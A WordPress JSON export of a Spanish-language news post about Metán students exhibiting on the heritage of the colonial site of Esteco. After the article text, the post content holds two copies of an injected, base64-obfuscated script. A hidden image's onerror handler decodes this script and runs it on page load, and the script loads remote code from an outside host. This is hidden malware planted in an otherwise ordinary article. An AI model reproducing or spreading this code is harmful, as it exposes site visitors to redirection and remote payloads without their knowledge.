{"id":1752,"date":"2022-11-08T11:23:20","date_gmt":"2022-11-08T14:23:20","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1752"},"modified":"2025-08-14T00:30:50","modified_gmt":"2025-08-14T03:30:50","slug":"estudiantes-de-metan-exponen-sobre-el-patrimonio-arqueologico-e-historico-del-sitio-esteco","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1752","title":{"rendered":"Estudiantes de Met\u00e1n exponen sobre el patrimonio arqueol\u00f3gico e hist\u00f3rico del Sitio Esteco"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#863801\"><em>Desde hoy 8 al 13 de noviembre en el Centro Cultural Am\u00e9rica, visibilizar\u00e1n la ciudad colonial promoviendo su protecci\u00f3n efectiva. Inauguraci\u00f3n 8 de noviembre a las 18 horas con entrada gratuita.<\/em><\/h4>\n\n\n\n<p>El Colegio Secundario N\u00ba 5099 Juan Carlos D\u00e1valos de San Jos\u00e9 de Met\u00e1n con el apoyo de la Secretar\u00eda de Cultura de la Provincia, presenta la muestra \u201cNuestra Se\u00f1ora de Talavera de Madrid de Esteco, Monumento Hist\u00f3rico Nacional\u201d con el objetivo de dar a conocer a trav\u00e9s de sus pinturas, la riqueza patrimonial, arqueol\u00f3gica e hist\u00f3rica que representa y las medidas que ayuden a su protecci\u00f3n efectiva.<\/p>\n\n\n\n<p>En el marco del 413 aniversario de la fundaci\u00f3n de la ciudad colonial, fundada por Alonso de Ribera en 1609 y a 330 a\u00f1os de su destrucci\u00f3n provocada por un terremoto el 13 de septiembre de 1692 que da origen al culto del Se\u00f1or y la Virgen del Milagro, se presenta la muestra que combina leyenda, historia y arqueolog\u00eda.<\/p>\n\n\n\n<p>La inauguraci\u00f3n tendr\u00e1 lugar hoy&nbsp;martes 8 de noviembre a las 18 horas en la sala Juana Manuela Gorriti del Centro Cultural Am\u00e9rica, Mitre 23. Estar\u00e1 abierta al p\u00fablico en general hasta el 13 de noviembre de 9 a 21 horas con entrada gratuita.<\/p>\n\n\n\n<p>Este a\u00f1o, el Honorable Senado de la Naci\u00f3n Argentina dio media sanci\u00f3n al proyecto que lo declara Monumento Hist\u00f3rico Nacional. La fundamentaci\u00f3n del mismo, fue redactada por estudiantes de 3\u00ba a\u00f1o 7\u00aa divisi\u00f3n de la modalidad en Ciencias Sociales y Humanidades, con el acompa\u00f1amiento de la profesora Norma Aguilar, desde la c\u00e1tedra Historia Regional y Local de la instituci\u00f3n educativa.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/estudiantes-de-metan-exponen-sobre-el-patrimonio-arqueologico-e-historico-del-sitio-esteco-85932\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Desde hoy 8 al 13 de noviembre en el Centro Cultural Am\u00e9rica, visibilizar\u00e1n la ciudad colonial promoviendo su protecci\u00f3n efectiva. Inauguraci\u00f3n 8 de noviembre a las 18 horas con entrada gratuita. El Colegio Secundario N\u00ba 5099 Juan Carlos D\u00e1valos de San Jos\u00e9 de Met\u00e1n con el apoyo de la Secretar\u00eda de Cultura de la Provincia, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1753,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,9,18],"tags":[],"class_list":{"0":"post-1752","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-museos","9":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1752"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1752"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1752\/revisions"}],"predecessor-version":[{"id":7284,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1752\/revisions\/7284"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1753"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1752"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1752"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1752"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}